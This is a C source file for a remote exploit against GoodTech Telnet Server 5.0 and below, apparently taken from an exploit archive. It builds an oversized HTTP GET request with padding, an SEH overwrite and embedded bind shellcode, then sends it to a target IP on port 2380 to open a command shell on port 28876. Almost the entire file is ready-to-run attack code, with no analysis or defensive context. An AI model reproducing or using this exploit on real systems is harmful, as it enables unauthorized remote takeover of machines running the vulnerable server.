GoodTech Telnet Server versions 5.0 and below remote root exploit.
401b4f1dc1a78082494dfefdb04709e899b6ebddd4e4ce7b99c3cd0f3b876d50
/* GoodTech Telnet Server <= 5.0 remote r00t exploit
\ by darkeagle
/
\ Using SEH exploiting technique avoid protection.
/ ___ _ __
\
/
\ greetz: ChoiX, nekd0, antiq, CoKi, xtix, crash etc...
/
\ © http://unl0ck.org - darkeagle[at]unl0ck[dot]org
/
\
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
// Bindcode spawns a binshell on port 28876 (Thanks to metasploit.com guys)
unsigned char shellcode[] =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
"\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
"\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
"\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
"\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
"\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
"\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
"\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
"\x83\xc4\x5c\x61\xeb\x89\x41";
int main(int argc, char **argv)
{
int err;
unsigned char mex[300000];
SOCKET sock;
struct sockaddr_in sock_addr;
WSADATA data;
WSAStartup(MAKEWORD(2,0),&data);
if ( argc < 2 ) { printf("\nGoodTech Telnet Server <= 5.0 remote r00t exploit\n\tby darkeagle\n\nusage: %s <ip>\n\n", argv[0]);
exit(5); }
sock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(2380); /* Administration web server port */
sock_addr.sin_addr.s_addr= inet_addr(argv[1]);
err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
if ( err<0 ) {
printf("Unable to connect() to %s\n", argv[1]);
exit(555);
}
strcpy (mex, "GET /");
memset(mex+strlen(mex), 0x55, 10007);
strcat(mex, "\xEB\x06\x90\x90"); // 0x909006eb
strcat(mex, "\xCD\x59\xF5\x77"); // 0x77F559CD
strcat(mex, shellcode);
strcat(mex, "\r\n\r\n");
printf("Sending %d bytes.....\n\n", strlen(mex));
send(sock, mex , strlen(mex), 0);
closesocket(sock);
WSACleanup();
return 0;
}